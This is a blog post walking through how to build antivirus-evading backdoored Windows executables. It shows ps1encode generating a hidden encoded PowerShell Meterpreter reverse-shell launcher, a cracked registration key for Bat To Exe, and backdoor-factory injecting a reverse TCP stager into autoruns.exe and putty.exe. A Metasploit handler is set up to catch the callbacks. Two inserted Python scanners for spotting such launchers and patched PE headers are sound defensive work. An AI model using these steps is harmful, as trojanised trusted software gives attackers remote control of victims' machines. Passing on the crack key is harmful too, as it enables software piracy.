Anti Detection – PE Backdoor Manufacturing

1.ps1encode

[ blackarch drive_c ]# ps1encode
Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd] --32bitexe

-i, --LHOST VALUE Local host IP address
-p, --LPORT VALUE Local host port number
--32bitexe Force 32 bit EXE
-a, --PAYLOAD VALUE Payload to use
-t, --ENCODE VALUE Output format: raw, cmd, vba, vbs, war, exe, java, js, js-rd32, php, hta, cfm, aspx, lnk, sct

ps1encode -i 192.168.1.110 -p 5555 --32bitexe -a windows/meterpreter/reverse_tcp -t cmd >backdoor.cmd

"powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAA

......"
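The launcher that ps1encode emits is recognisable on the defender's side by its shape alone: an encoded command combined with the no-profile, non-interactive and hidden-window switches. The following scanner is an added example for this post (it is not part of ps1encode); it resolves PowerShell's prefix-abbreviated parameters (so -nop, -noni, -win and -enc are matched as well as their long forms), decodes the UTF-16LE base64 payload for analyst review and scores the line. The command lines and the encoded script are constructed samples.

```python
"""Flag PowerShell launch lines shaped like the ps1encode output above.

Added example for this post (not part of ps1encode). Sample command lines are
constructed; the encoded script is a harmless Write-Host.
"""
import base64
import re


def prefixes(word, minimum):
    """PowerShell accepts any unambiguous prefix of a parameter name, so build
    an alternation of every prefix of `word` down to `minimum` characters,
    longest first so the regex engine tries the full spelling before short forms."""
    return '|'.join(re.escape(word[:i]) for i in range(len(word), minimum - 1, -1))


RE_NOPROFILE = re.compile(r'-(?:%s)\b' % prefixes('noprofile', 3), re.I)
RE_NONINTERACTIVE = re.compile(r'-(?:%s)\b' % prefixes('noninteractive', 4), re.I)
RE_HIDDEN = re.compile(r'-(?:%s)\s+hidden\b' % prefixes('windowstyle', 1), re.I)
RE_ENCODED = re.compile(r'-(?:%s)\s+([A-Za-z0-9+/=]{16,})' % prefixes('encodedcommand', 1), re.I)


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the script as UTF-16LE; return the script text."""
    try:
        return base64.b64decode(blob).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return '<undecodable>'


def analyze(cmdline):
    """Return which launcher traits a command line shows, the decoded script (if any),
    and a verdict: an encoded command plus at least two stealth switches is flagged."""
    flags = {
        'noprofile': bool(RE_NOPROFILE.search(cmdline)),
        'noninteractive': bool(RE_NONINTERACTIVE.search(cmdline)),
        'hidden_window': bool(RE_HIDDEN.search(cmdline)),
    }
    m = RE_ENCODED.search(cmdline)
    flags['encoded'] = m is not None
    decoded = decode_encoded_command(m.group(1)) if m else None
    score = sum(flags.values())
    return {
        'flags': flags,
        'score': score,
        'decoded': decoded,
        'suspicious': flags['encoded'] and score >= 3,
    }


# Constructed samples: one line shaped like the ps1encode launcher, one ordinary admin task.
ENCODED_SCRIPT = base64.b64encode('Write-Host "constructed sample"'.encode('utf-16-le')).decode()
SAMPLES = {
    'launcher': 'powershell -nop -win Hidden -noni -enc ' + ENCODED_SCRIPT,
    'admin': 'powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
}

if __name__ == '__main__':
    for label, line in SAMPLES.items():
        result = analyze(line)
        print('%-8s suspicious=%s score=%d flags=%s' % (label, result['suspicious'], result['score'], result['flags']))
        if result['decoded']:
            print('         decoded: %r' % result['decoded'])
```

The prefix expansion matters in practice: a rule that only matches the literal string "-EncodedCommand" misses "-enc", "-ec" and "-e", all of which PowerShell accepts. Feed real process-creation telemetry (command-line field) through analyze() and review the decoded text for the flagged lines.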

2.battoexe

official website:

https://www.battoexe.com/

direct download link:

https://www.battoexe.com/battoexe.exe

Crack reg file: crack.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Abyssmedia\Quick Batch File Compiler\Settings]
"key"="05A61-D7984-9DD1D-E8D5A"

Convert backdoor.cmd into an executable file. (This could not bypass Qihoo 360.)

3.backdoor-factory (e.g. autoruns.exe)

source link: https://github.com/secretsquirrel/the-backdoor-factory

---------------------------------------------usage--------------------------------------------------------

-S: check whether the binary supports code injection

[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe -S

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded

 

-c: once we have confirmed that the binary can be patched, check whether it has caves large enough for the shellcode patch we specify (-l gives the required length in bytes)

[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe -c -l 200

[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
Looking for caves with a size of 200 bytes (measured as an integer
[*] Looking for caves
No section
->Begin Cave 0x2c8
->End of Cave 0x400
Size of Cave (int) 312
**************************************************
No section
->Begin Cave 0x403
->End of Cave 0x604
Size of Cave (int) 513
**************************************************
We have a winner: .rdata
->Begin Cave 0xd71
->End of Cave 0xec8
Size of Cave (int) 343
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x219b4
->End of Cave 0x21ab8
Size of Cave (int) 260
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x21bb7
->End of Cave 0x21cb8
Size of Cave (int) 257
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x24d10
->End of Cave 0x24e00
Size of Cave (int) 240
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .data
->Begin Cave 0x252cc
->End of Cave 0x25399
Size of Cave (int) 205
SizeOfRawData 0xc00
PointerToRawData 0x24e00
End of Raw Data: 0x25a00
**************************************************
We have a winner: .data
->Begin Cave 0x253d3
->End of Cave 0x254b2
Size of Cave (int) 223
SizeOfRawData 0xc00
PointerToRawData 0x24e00
End of Raw Data: 0x25a00
**************************************************
No section
->Begin Cave 0x25ab1
->End of Cave 0x25c0e
Size of Cave (int) 349
**************************************************
We have a winner: .rsrc
->Begin Cave 0x28aaf
->End of Cave 0x28c00
Size of Cave (int) 337
SizeOfRawData 0x3000
PointerToRawData 0x25c00
End of Raw Data: 0x28c00
**************************************************
We have a winner: .xdata
->Begin Cave 0xb0e0b
->End of Cave 0xb1000
Size of Cave (int) 501
SizeOfRawData 0x800
PointerToRawData 0xb0800
End of Raw Data: 0xb1000
**************************************************
No section
->Begin Cave 0xb30cf
->End of Cave 0xb3201
Size of Cave (int) 306
**************************************************
[*] Total of 12 caves found

 

-s SHELL, --shell=SHELL: the payload to use; pass "show" to list the available payloads

[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe -s show

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded

[ blackarch backdoor-factory ]# backdoor-factory -f `which nc` -s show

[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[!] Only supporting executable elf e_types, things may get weird.
[*] Getting shellcode length
The following LinuxIntelELF64s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell

------------------------------------------------------------------------------------------------------------

 

[ blackarch backdoor-factory ]# backdoor-factory -f autoruns.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.115 -P 5555 -o autoruns2.exe
____ ____ ______ __
/ __ )/ __ \/ ____/___ ______/ /_____ _______ __
/ __ / / / / /_ / __ `/ ___/ __/ __ \/ ___/ / / /
/ /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / / / /_/ /
/_____/_____/_/ \__,_/\___/\__/\____/_/ \__, /
/____/

Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory

Version: 3.4.2

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding VirtualAlloc Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 453
[*] All caves lengths: 453
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 453
[*] Available caves:
1. Section Name: .data; Section Begin: 0x89c00 End: 0x8d000; Cave begin: 0x8b94d End: 0x8bb74; Cave Size: 551
2. Section Name: None; Section Begin: None End: None; Cave begin: 0x8ce22 End: 0x8d00a; Cave Size: 488
3. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x974d3 End: 0x97754; Cave Size: 641
4. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x98c13 End: 0x98f64; Cave Size: 849
5. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x99d0f End: 0x99f59; Cave Size: 586
6. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9a737 End: 0x9a981; Cave Size: 586
7. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9bf7b End: 0x9c185; Cave Size: 522
8. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9c69a End: 0x9c874; Cave Size: 474
9. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9d483 End: 0x9d6c0; Cave Size: 573
10. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9d822 End: 0x9de2f; Cave Size: 1549
11. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9f5a8 End: 0x9fc2c; Cave Size: 1668
12. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9fdca End: 0xa005b; Cave Size: 657
13. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa0a90 End: 0xa0dd4; Cave Size: 836
14. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa3f03 End: 0xa4178; Cave Size: 629
15. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa448b End: 0xa4708; Cave Size: 637
16. Section Name: .reloc; Section Begin: 0xa7400 End: 0xae400; Cave begin: 0xae230 End: 0xae3fc; Cave Size: 460
**************************************************
[!] Enter your selection: 1
[!] Using selection: 1
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File putty2.exe is in the 'backdoored' directory

[ blackarch backdoor-factory ]# msfconsole

msf5>use exploit/multi/handler

msf5>set payload windows/meterpreter/reverse_tcp

msf5>set LHOST 192.168.1.115

msf5>set LPORT 5555

msf5>exploit
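The cave search and the patch run above show what this kind of tool leaves behind in the target: the log reports "Changing flags for section: .data" (a data section gets the execute bit so the cave it holds can run), "Adding New Section for updated Import Table" and "Overwriting certificate table pointer" (the Authenticode signature is discarded because the patched file would no longer verify). Those are exactly the header artefacts a defender can check for. The scanner below is an added example for this post; it is not part of backdoor-factory or any other tool named here. It parses the PE headers with struct only, flags executable data sections and entry points that no longer land in executable code, and, when a known-good copy of the binary is available, diffs the headers of the two. The PE images it runs on are constructed minimal headers, not real executables.

```python
"""Scan a PE header for the marks a cave-injecting patcher leaves behind.

Added example for this post; not part of backdoor-factory. Pure struct
parsing (no pefile). The sample images are constructed headers.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
CODE_SECTION_NAMES = {b'.text', b'CODE', b'INIT', b'PAGE'}  # names where execute is expected


def parse_pe(data):
    """Return entry-point RVA, certificate data directory and section headers."""
    if data[:2] != b'MZ':
        raise ValueError('missing MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from('<HHIIIHH', data, coff)
    opt = coff + 20
    magic = struct.unpack_from('<H', data, opt)[0]
    entry = struct.unpack_from('<I', data, opt + 16)[0]
    # Data directories start at +96 (PE32) or +112 (PE32+); index 4 is the certificate table.
    dd = opt + (96 if magic == 0x10B else 112)
    cert = struct.unpack_from('<II', data, dd + 4 * 8)
    sections = []
    for i in range(nsections):
        f = struct.unpack_from('<8sIIIIIIHHI', data, opt + opt_size + 40 * i)
        sections.append({'name': f[0].rstrip(b'\0'), 'vsize': f[1], 'vaddr': f[2],
                         'rsize': f[3], 'rptr': f[4], 'chars': f[9]})
    return {'entry': entry, 'cert': cert, 'sections': sections}


def scan_pe(data):
    """Single-file heuristics; an empty list means nothing suspicious was seen."""
    pe = parse_pe(data)
    findings = []
    entry = pe['entry']
    home = next((s for s in pe['sections']
                 if s['vaddr'] <= entry < s['vaddr'] + max(s['vsize'], s['rsize'])), None)
    if home is None:
        findings.append('entry point 0x%x is outside every section' % entry)
    elif not home['chars'] & IMAGE_SCN_MEM_EXECUTE:
        findings.append('entry point 0x%x is in non-executable section %s'
                        % (entry, home['name'].decode(errors='replace')))
    for s in pe['sections']:
        name = s['name'].decode(errors='replace')
        if s['chars'] & IMAGE_SCN_MEM_EXECUTE and s['chars'] & IMAGE_SCN_MEM_WRITE:
            findings.append('section %s is RWX' % name)          # e.g. .data made executable
        elif s['chars'] & IMAGE_SCN_MEM_EXECUTE and s['name'] not in CODE_SECTION_NAMES:
            findings.append('section %s has the execute flag set' % name)
    return findings


def compare_pe(known_good, suspect):
    """Diff the headers of a trusted copy against a suspect copy of the same binary."""
    a, b = parse_pe(known_good), parse_pe(suspect)
    diffs = []
    if a['entry'] != b['entry']:
        diffs.append('entry point moved 0x%x -> 0x%x' % (a['entry'], b['entry']))
    if a['cert'][1] and not b['cert'][1]:
        diffs.append('certificate table removed (signature stripped)')
    if len(b['sections']) > len(a['sections']):
        added = [s['name'].decode(errors='replace') for s in b['sections'][len(a['sections']):]]
        diffs.append('section(s) added: %s' % ', '.join(added))
    for x, y in zip(a['sections'], b['sections']):
        if x['chars'] != y['chars']:
            diffs.append('section %s characteristics 0x%08x -> 0x%08x'
                         % (x['name'].decode(errors='replace'), x['chars'], y['chars']))
    return diffs


def build_test_pe(sections, entry_rva, cert_size=0):
    """Constructed minimal PE32 header (not loadable) to exercise the scanner offline.
    sections: list of (name bytes, VirtualAddress, Characteristics)."""
    dos = bytearray(64)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack('<HHIIIHH', 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into('<H', opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into('<I', opt, 16, entry_rva)                  # AddressOfEntryPoint
    struct.pack_into('<II', opt, 96 + 4 * 8, 0x800 if cert_size else 0, cert_size)
    hdrs = b''.join(struct.pack('<8sIIIIIIHHI', name, 0x1000, vaddr, 0x200, 0x400 + 0x200 * i,
                                0, 0, 0, 0, chars) for i, (name, vaddr, chars) in enumerate(sections))
    return bytes(dos) + b'PE\0\0' + coff + bytes(opt) + hdrs


TEXT_RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Constructed samples: a signed clean layout, the same layout after .data was made
# executable and the signature dropped, and one whose entry point was moved into .data.
CLEAN_SAMPLE = build_test_pe([(b'.text', 0x1000, TEXT_RX), (b'.data', 0x2000, DATA_RW)], 0x1000, cert_size=0x400)
PATCHED_SAMPLE = build_test_pe([(b'.text', 0x1000, TEXT_RX), (b'.data', 0x2000, DATA_RW | IMAGE_SCN_MEM_EXECUTE)], 0x1000)
MOVED_ENTRY_SAMPLE = build_test_pe([(b'.text', 0x1000, TEXT_RX), (b'.data', 0x2000, DATA_RW)], 0x2000)

if __name__ == '__main__':
    for label, img in (('clean', CLEAN_SAMPLE), ('patched', PATCHED_SAMPLE), ('moved', MOVED_ENTRY_SAMPLE)):
        print(label, scan_pe(img))
    print('diff clean -> patched:', compare_pe(CLEAN_SAMPLE, PATCHED_SAMPLE))
```

For real files read the bytes from disk and call scan_pe() on each, and keep a known-good copy (or the vendor's download) to feed compare_pe(): the single-file heuristics catch the executable-data-section case, but a stripped signature or an appended section only stands out against a trusted baseline. Section characteristics that differ between two builds of the same version are a strong signal on their own, since legitimate rebuilds rarely turn a data section executable.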

 

4.TheFatRat

https://github.com/Screetsec/TheFatRat

5.Veil

https://github.com/Veil-Framework/Veil/

6.Cminer

https://github.com/EgeBalci/Cminer

posted @ 2019-01-14 18:59 heycomputer